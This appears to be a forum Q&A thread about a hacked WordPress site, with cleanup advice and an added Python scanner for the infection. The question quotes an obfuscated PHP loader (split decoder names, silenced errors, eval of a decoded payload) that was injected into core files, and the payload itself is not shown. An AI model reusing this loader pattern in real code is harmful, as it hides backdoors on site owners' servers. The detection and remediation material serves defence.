-1

I have a problem with WordPress. Someone infected my WordPress catalogue. Core, theme and plugins are up to date. In the files xmlrpc.php, wp-trackback.php, wp-signup.php etc. (all PHP files), I have the code below added at the end of the file. When I delete this code from the files, it appears again within the next few days :(

<?php $dAglL = 'b'.'ase64'.'_d'.'ecode'; $lufhp = 'st'.'r'.'_ro'.'t13'; $waAFR = 's'.'t'.'rrev'; $QIGep = 'g'.'zuncompre'.'ss'; error_reporting(0); ini_set('error_log', NULL); eval($QIGep($waAFR($lufhp($dAglL('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'))))); ?>
Krystian
  • Shared hosting? – itachi Jan 09 '23 at 15:12
  • If they can get in once, they can get in twice (and they likely left back-doors in various places). Restore to a backup, update your server's packages (and make sure you're on a supported, 8.x version of PHP), update your WordPress installation and any plugins, etc. Read https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server, too. – ceejayoz Jan 09 '23 at 15:14
  • Check directory permissions; also, for folders containing uploads, add an .htaccess that disables PHP for those folders – john Smith Jan 09 '23 at 15:20

1 Answer

1

Do you have any idea what elements could have caused this security issue? You need to find the source of the problem; if not, no matter what you do, it might happen again.

However, here is what I suggest to you:

  1. Back up all your website's current data: files, database, etc.
  2. You can completely reinstall all core files like wp-admin, wp-includes etc. The best solution will be to reinstall a fresh WordPress, then import your backed-up database and also re-add your files in "wp-content"
  3. Check your "uploads" directory; maybe the "hacker" installed a malicious file
  4. Check your "wp_users" table to see if there is any unknown user, and also change your admin password
  5. DON'T USE any cracked plugin, theme etc. Maybe it is not your case, but I prefer to highlight it, because it is very important
  6. You can also install this plugin to see what happens on your website. You will not see everything, but it can help in some cases: https://wordpress.org/plugins/stream/
Ah Hu
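To find every file carrying the appended loader from the question, and any PHP sitting in "uploads" as step 3 of the answer suggests, a triage script can merge the split string fragments and look for the same traits. This is an added example, not code from the question, the answer or any WordPress tool; `score_php` and `scan` are hypothetical names, the sample string is constructed with the payload replaced by a placeholder, and the checks are heuristics for this snippet's shape only.

```python
import re
import sys
from pathlib import Path

# Decoder functions whose names the injected snippet builds from fragments.
DECODERS = ("base64_decode", "str_rot13", "strrev", "gzuncompress")
# Matches the quote-dot-quote join in 'b'.'ase64' so fragments can be merged.
CONCAT = re.compile(r"""['"]\s*\.\s*['"]""")
# eval( $var( ... : eval fed by a call through a variable function name.
EVAL_VARFUNC = re.compile(r"eval\s*\(\s*\$\w+\s*\(")
SILENCED = re.compile(r"error_reporting\s*\(\s*0\s*\)")

# Constructed sample: the question's snippet shape, payload replaced by a placeholder.
SAMPLE = r"""<?php echo 'legit'; ?>
<?php $a = 'b'.'ase64'.'_d'.'ecode'; $b = 'g'.'zuncompre'.'ss';
error_reporting(0); ini_set('error_log', NULL); eval($b($a('PLACEHOLDER'))); ?>"""

def score_php(source: str) -> list[str]:
    """Return the reasons a PHP source resembles the injected loader."""
    merged = CONCAT.sub("", source)
    reasons = []
    # Names that only appear once string fragments are merged were hidden on purpose.
    hidden = [d for d in DECODERS if d in merged and d not in source]
    if hidden:
        reasons.append("split decoder names: " + ", ".join(hidden))
    if EVAL_VARFUNC.search(source):
        reasons.append("eval of a variable-function call")
    if SILENCED.search(source) and "error_log" in source:
        reasons.append("error reporting and logging silenced")
    return reasons

def scan(root: str) -> dict[str, list[str]]:
    """Walk root and map each suspicious .php path to its reasons."""
    findings = {}
    for path in Path(root).rglob("*.php"):
        reasons = score_php(path.read_text(errors="replace"))
        # WordPress uploads should hold media, not executable PHP.
        if "uploads" in path.relative_to(root).parts:
            reasons.append("PHP file under uploads")
        if reasons:
            findings[str(path)] = reasons
    return findings

if __name__ == "__main__":
    for name, why in sorted(scan(sys.argv[1] if len(sys.argv) > 1 else ".").items()):
        print(name, "|", "; ".join(why))
```

Run it against a copy of the site taken before cleanup; a clean result does not rule out other back-doors, so it complements the reinstall rather than replacing it.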